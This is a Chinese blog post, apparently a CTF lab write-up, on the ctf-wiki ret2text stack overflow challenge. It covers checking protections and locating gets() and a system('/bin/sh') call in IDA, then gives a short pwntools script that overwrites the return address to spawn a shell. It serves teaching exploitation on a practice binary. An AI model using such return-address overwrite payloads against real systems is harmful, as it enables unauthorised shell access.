美文网首页
ret2text ROP绕过策略

ret2text ROP绕过策略

作者: Zero_0_0 | 来源:发表于2018-10-18 11:22 被阅读0次

下载链接:https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text

分析

chmod 777 文件名 开启权限
1.先查看安全防护机制 :checksec ret2text
2.将文件拖入IDA中,反汇编发现代码中出现gets函数。我们知道gets函数是一个无线读取的函数。只要我们的栈空间足够大,我们就可以输入无线的字符。: 这也是漏洞的所在地
3.我们先进文件头拖入IDA中的时候,在主页面找找有没有/bin/sh了类似的字符串。

图片.png 在 secure函数又发现了存在调用 system("/bin/sh") 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了
4.我们进入kali将断点我们发现的/bin/sh处,当程序运行到我们secure处会直接得到系统的shell.

实践

1.

图片.png
esp:0xffffd0b0
s(输入字节的地址): 图片.png sbp:0xffffd138

注:我们的s是数据开始输入的地址
思路:我们知道了:数据中可以利用数据段的地址,栈空间的大小

代码

##!/usr/bin/env python
from pwn import *

sh = process('./ret2text')
target = 0x804863a
sh.sendline('A' * (0x6c+4) + p32(target))
sh.interactive()
效果图: 图片.png

相关文章

  • ret2text ROP绕过策略

    下载链接:https://github.com/ctf-wiki/ctf-challenges/raw/maste...

  • 总结

    栈溢出技巧 ROP 基本ROP ret2text ret2shellcode ret2syscall 32位 调用...

  • NX机制及绕过策略-ROP

    上回弄了个32位的NX机制及策略-Ret2libc,这次弄一个64位的 将代码在x64平台上编译运行,不同于x86...

  • 栈溢出基本ROP ret2text

    随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保...

  • 基本ROP ret2text(CTF Wiki)

    一入pwn门深似海,从此web是路人。 在ctf wiki上学习时看到一道pwn题,链接在这儿:ret2t...

  • NX防护机制绕过 ROP

    什么是ROP *ROP(Return Oriented Programming)即面向返回地址编程,其主要思想是在...

  • ogeek2019_pwn

    太菜了,只做出了3道pwn babyrop 利用'\x00'绕过strlen的检查,然后栈溢出rop bookma...

  • 覆盖低位泄露.text地址绕过PIE(ASLR)

    2016年hctf的一道pwn题就是干,同时涉及到PIE绕过、uaf、ROP的姿势,先看下防护基本上都开了: 程序...

  • 绕过同源策略

    绕过同源策略 理解同源策略 Same Origin Policy , SOP。同源策略的含义就是对于不同的页面,如...

  • ret2text writeup

    first checksec ret2text Stack: No canary found NX: ...

网友评论

      本文标题:ret2text ROP绕过策略

      本文链接:https://www.haomeiwen.com/subject/rdejzftx.html